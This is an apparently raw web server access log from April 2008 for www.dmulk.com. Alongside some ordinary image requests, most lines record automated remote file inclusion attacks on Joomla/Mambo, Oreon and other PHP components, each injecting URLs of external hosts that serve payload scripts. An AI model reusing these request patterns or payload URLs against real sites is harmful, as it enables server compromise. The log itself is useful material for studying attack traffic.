84.19.182.210 - - [10/Apr/2008:13:35:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sindom.altervista.org/tho.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
84.19.182.210 - - [10/Apr/2008:13:35:50 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sindom.altervista.org/tho.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:35:53 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:16 -0700] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:16 -0700] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:16 -0700] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:16 -0700] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:17 -0700] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:17 -0700] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:17 -0700] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:17 -0700] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:17 -0700] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:19 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:19 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:19 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:19 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:20 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:21 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
24.218.162.48 - - [10/Apr/2008:13:36:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
168.158.128.26 - - [10/Apr/2008:13:36:28 -0700] "GET /logs/access_071230.log/Exchange/include.php?webappcfg[APPPATH]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:36:29 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:36:29 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:36:29 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.158.128.26 - - [10/Apr/2008:13:36:43 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
168.158.128.26 - - [10/Apr/2008:13:36:43 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
168.158.128.26 - - [10/Apr/2008:13:36:43 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.129.206 - - [10/Apr/2008:13:37:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.129.206 - - [10/Apr/2008:13:37:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.115 - - [10/Apr/2008:13:37:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.115 - - [10/Apr/2008:13:37:11 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.179.229.229 - - [10/Apr/2008:13:37:15 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:13:37:23 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:13:37:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.95.229.254 - - [10/Apr/2008:13:37:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:13:37:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:37:36 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:37:37 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:37:37 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.13.129.206 - - [10/Apr/2008:13:37:59 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:38:05 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:38:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:38:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.41.83.2 - - [10/Apr/2008:13:38:09 -0700] "GET /logs/access_080218.log//index.php?mosConfig_absolute_path=http://fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.3.251 - - [10/Apr/2008:13:38:11 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.13.129.206 - - [10/Apr/2008:13:38:21 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:38:25 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.179.229.229 - - [10/Apr/2008:13:38:25 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:38:26 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:38:26 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.95.229.254 - - [10/Apr/2008:13:38:30 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:39:13 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:39:13 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:39:13 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.68.228.146 - - [10/Apr/2008:13:39:32 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.68.228.146 - - [10/Apr/2008:13:39:33 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.68.228.146 - - [10/Apr/2008:13:39:33 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:39:56 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:39:56 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.68.228.146 - - [10/Apr/2008:13:40:01 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:13:40:17 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.158.128.26 - - [10/Apr/2008:13:40:59 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:41:36 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:41:46 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:13:42:12 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:42:52 -0700] "GET /logs/access_080321.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:13:43:05 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:13:43:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:13:43:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:13:43:17 -0700] "GET /logs/access_080321.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:44:51 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:44:51 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:44:51 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:45:11 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:13:45:33 -0700] "GET /logs/access_080308.log/index.php?redir=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:13:45:34 -0700] "GET /index.php?redir=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:13:45:35 -0700] "GET /logs/index.php?redir=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:13:45:38 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:13:45:38 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:45:40 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.203.221.50 - - [10/Apr/2008:13:45:43 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.221.50 - - [10/Apr/2008:13:45:43 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.221.50 - - [10/Apr/2008:13:45:43 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.221.50 - - [10/Apr/2008:13:45:50 -0700] "GET /logs/access_080131.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.249.105.111 - - [10/Apr/2008:13:46:05 -0700] "GET /logs/access_080215.log/index.php?redir=http://h1.ripway.com/raru/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.226.183 - - [10/Apr/2008:13:46:12 -0700] "GET /logs/access_080308.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.62.54.120 - - [10/Apr/2008:13:46:37 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
